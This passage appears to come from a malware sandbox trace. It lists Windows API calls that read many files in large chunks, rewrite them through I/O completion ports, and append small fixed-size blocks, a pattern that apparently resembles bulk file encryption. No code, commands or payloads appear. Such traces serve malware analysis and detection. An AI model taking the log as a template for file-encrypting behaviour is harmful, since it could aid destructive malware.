lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.765] WriteFile (in: hFile=0x644, lpBuffer=0x2f30124, nNumberOfBytesToWrite=0x1611e, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x2f30020) returned 0x0 [0150.786] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.786] WriteFile (in: hFile=0x66c, lpBuffer=0x4280124, nNumberOfBytesToWrite=0x13861, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4280020) returned 0x0 [0150.792] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.792] WriteFile (in: hFile=0x658, lpBuffer=0x4820124*, nNumberOfBytesToWrite=0xaef0, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4820020) returned 1 [0150.811] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.811] ReadFile (in: hFile=0x644, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0150.811] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.811] ReadFile (in: hFile=0x66c, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4280020) returned 0x0 [0150.811] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.811] ReadFile (in: hFile=0x610, lpBuffer=0x4a60124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4a60020) returned 1 [0150.811] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.811] ReadFile (in: hFile=0x61c, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4700020) returned 0x0 [0150.811] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.811] ReadFile (in: hFile=0x658, lpBuffer=0x4820124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4820020) returned 0x0 [0150.811] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0150.811] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0150.811] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0150.812] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0150.812] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.812] WriteFile (in: hFile=0x610, lpBuffer=0x4a60124*, nNumberOfBytesToWrite=0x510f, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4a60020) returned 1 [0150.819] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.821] ReadFile (in: hFile=0x134, lpBuffer=0x4940124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4940020) returned 0x0 [0150.821] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.829] CloseHandle (hObject=0x61c) returned 1 [0150.847] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4700020) returned 1 [0150.847] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0156.029] WriteFile (in: hFile=0x638, lpBuffer=0x4c10124*, nNumberOfBytesToWrite=0x66d4, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4c10020 | out: lpBuffer=0x4c10124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4c10020) returned 1 [0156.036] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0156.039] WriteFile (in: hFile=0x658, lpBuffer=0x4670094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4670020 | out: lpBuffer=0x4670094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4670020) returned 1 [0156.044] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0156.044] WriteFile (in: hFile=0x648, lpBuffer=0x49d0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x49d0020) returned 1 [0156.070] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0156.072] CloseHandle (hObject=0x61c) returned 1 [0156.082] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4790020) returned 1 [0156.082] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0156.082] CloseHandle (hObject=0x66c) returned 1 [0156.092] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4af0020) returned 1 [0156.093] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0156.113] ReadFile (in: hFile=0x620, lpBuffer=0x2880124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x2880020 | out: lpBuffer=0x2880124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x2880020) returned 1 [0156.113] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 Thread: id = 129 os_tid = 0xa60 [0136.132] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0147.692] WriteFile (in: hFile=0x644, lpBuffer=0x4700124*, nNumberOfBytesToWrite=0x5e02, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4700020) returned 1 [0147.717] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0147.717] ReadFile (in: hFile=0x634, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0147.717] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0147.717] WriteFile (in: hFile=0x648, lpBuffer=0x4af0124*, nNumberOfBytesToWrite=0xe2f3, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4af0020) returned 1 [0147.724] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0147.724] ReadFile (in: hFile=0x640, lpBuffer=0x49d0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x49d0020) returned 0x0 [0147.724] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 0 [0147.724] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x48b0020) returned 1 [0147.724] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0147.724] ReadFile (in: hFile=0x648, lpBuffer=0x4af0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0124, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4af0020) returned 0x0 [0147.724] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 0 [0147.724] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x49d0020) returned 1 [0147.725] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0147.725] WriteFile (in: hFile=0x618, lpBuffer=0x48b0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0094*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x48b0020) returned 1 [0147.736] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0147.736] CloseHandle (hObject=0x644) returned 1 [0147.751] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4700020) returned 1 [0147.751] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.009] WriteFile (in: hFile=0x624, lpBuffer=0x48b0124*, nNumberOfBytesToWrite=0xa9b6, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x48b0020) returned 1 [0148.016] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.016] WriteFile (in: hFile=0x654, lpBuffer=0x4790094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4790020 | out: lpBuffer=0x4790094*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4790020) returned 1 [0148.024] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.024] CloseHandle (hObject=0x620) returned 1 [0148.051] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x41f0020) returned 1 [0148.052] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.052] ReadFile (in: hFile=0x654, lpBuffer=0x4af0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0124*, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4af0020) returned 1 [0148.052] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.053] CloseHandle (hObject=0x640) returned 1 [0148.065] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x49d0020) returned 1 [0148.065] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.119] ReadFile (in: hFile=0x660, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x41f0020) returned 1 [0148.119] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.161] WriteFile (in: hFile=0x618, lpBuffer=0x4670124*, nNumberOfBytesToWrite=0x14179, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4670020) returned 1 [0148.166] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.166] ReadFile (in: hFile=0x618, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4670020) returned 0x0 [0148.166] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 0 [0148.166] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0148.166] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.166] WriteFile (in: hFile=0x618, lpBuffer=0x4670094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4670020 | out: lpBuffer=0x4670094*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4670020) returned 1 [0148.185] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.185] CloseHandle (hObject=0x618) returned 1 [0148.189] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4670020) returned 1 [0148.190] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.666] ReadFile (in: hFile=0x654, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x41f0020) returned 1 [0148.666] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.666] ReadFile (in: hFile=0x660, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4670020) returned 1 [0148.666] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.666] ReadFile (in: hFile=0x640, lpBuffer=0x4790124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124*, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4790020) returned 1 [0148.667] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.667] ReadFile (in: hFile=0x65c, lpBuffer=0x48b0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124*, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x48b0020) returned 1 [0148.667] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.667] ReadFile (in: hFile=0x624, lpBuffer=0x49d0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124*, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x49d0020) returned 1 [0148.667] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.667] ReadFile (in: hFile=0x64c, lpBuffer=0x4af0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0124*, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4af0020) returned 1 [0148.668] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.668] ReadFile (in: hFile=0x634, lpBuffer=0x4c10124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4c10020 | out: lpBuffer=0x4c10124*, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4c10020) returned 1 [0148.668] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.668] ReadFile (in: hFile=0x638, lpBuffer=0x4d30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4d30020 | out: lpBuffer=0x4d30124*, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4d30020) returned 1 [0148.669] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.669] ReadFile (in: hFile=0x1a8, lpBuffer=0x4e50124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4e50020 | out: lpBuffer=0x4e50124*, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4e50020) returned 1 [0148.669] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.669] ReadFile (in: hFile=0x614, lpBuffer=0x4f70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, 